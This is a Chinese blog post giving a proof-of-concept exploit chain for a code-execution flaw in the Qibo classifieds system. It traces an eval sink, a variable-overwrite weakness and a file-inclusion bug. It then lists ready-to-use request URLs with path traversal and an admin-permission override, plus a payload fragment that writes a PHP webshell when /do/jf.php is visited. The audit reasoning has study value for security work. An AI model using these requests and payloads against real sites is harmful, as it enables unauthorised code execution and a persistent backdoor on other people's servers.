【漏洞分析 】齐博分类系统 代码执行

参考资料：http://security.alibaba.com/blog/blog.htm?id=21

在北京折腾了几天，总算安顿下来，也入职了~~趁着入职前两天不太忙，把之前欠下来的这个POC补了一下~~

0x00 起

这个漏洞总体说来，和二次SQL注入漏洞的成因差不多。由后台的某一个点插入到数据库中（插入时，进行了转义，不存在SQL注入），然后前台访问某一个页面，将变量放入了eval中执行。

最近也想向代码审计方向走，所以尽可能的来复现一下通过审计发现漏洞的过程。主要工具是seay代码审计工具。

0x10 承

全局搜索eval，发现可疑点。

打开代码，发现数据来自qibo_jfabout表

打开jfabout表，发现存在这样的值：title=发表文章可得{$webdb[postArticleMoney]}个积分。看起来好像很有戏的样子，再搜一下有木有哪里可以添加东西到这个表里。

OK，打开看看：

有点儿不太好的感觉，虽然添加的时候没有经过过滤（注意，过滤和转义不同），但这个点竟然是在管理中心。

搜索jfadmin_mod，发现是配置文件 /data/group/3.php。

再搜索3.php，果然是在admin中包含进来的。

漏洞突然变得鸡肋了。。好像就没有什么办法了呢。。

0x20 转

既然jfadmin_mod是通过文件包含引入的，那找找有木有文件包含漏洞好了。

在跟进前两条之前，我们需要知道qibofenlei是怎样处理数据流（$_GET、$_POST等）的，也是搜索一下 $_GET，通过文件名筛选一下得到我们想要的结果：

进入文件之后：

$_GET=Add_S($_GET);

function Add_S($array){
    foreach($array as $key=>$value){
        @eregi("['\"]+",$key) && die('ERROR KEY!');
        if(!is_array($value)){            
            $value=str_replace("&#x","& # x",$value);    //¹ýÂËһЩ²»°²È«×Ö·û
            $value=preg_replace("/eval/i","eva l",$value);    //¹ýÂ˲»°²È«º¯Êý
            !get_magic_quotes_gpc() && $value=addslashes($value);
            $array[$key]=$value;
        }else{
            $array[$key]=Add_S($array[$key]); 
        }
    }
    return $array;
}

foreach($_GET AS $_key=>$_value){
    $_key=='GLOBALS' && die('error get value!');
    !ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];
}

POST、COOKIE同理。相当于把http://test.com/index.php?id=1中的$_GET['id']提取成$id。这种方法毫无疑问，是存在很大的安全隐患的。隐隐约约记得看过qibo的漏洞，是没有对key做过滤，造成覆盖全局变量，修复的方法应该就是添加了这样一句话：

!ereg("^\_[A-Z]+",$_key) && $$_key=$_GET[$_key];

我们接下来会用到的，就是通过变量覆盖，来引入上文中会用到的变量。

0x30 合

现在，我们的目标就是通过search.php中的文件包含漏洞把admin.php包含进来，然后把恶意数据写到数据库中。

我们尝试直接包含admin.php：

http://127.0.0.1:8080/test/qibofenlei/search.php?action=search&keyword=1&postdb[city_id]=../../hack/jfadmin/admin

通过print变量，可以看出文件成功包含。进一步：

http://127.0.0.1:8080/test/qibofenlei/search.php?action=search&keyword=1&postdb[city_id]=../../hack/jfadmin/admin

&action=addjf&Apower[jfadmin_mod]=1

成功进到执行query的地方。进一步：

http://127.0.0.1:8080/test/qibofenlei/search.php?action=search&keyword=1&postdb[city_id]=../../hack/jfadmin/admin

&action=addjf&Apower[jfadmin_mod]=1

&fid=111&title=test&content=fdafds&list=23333

查看数据库添加成功~~

然后把content改成${@fwrite(fopen('%d.php', 'w+')，即可写入恶意代码。

访问/do/jf.php 即可生成木马。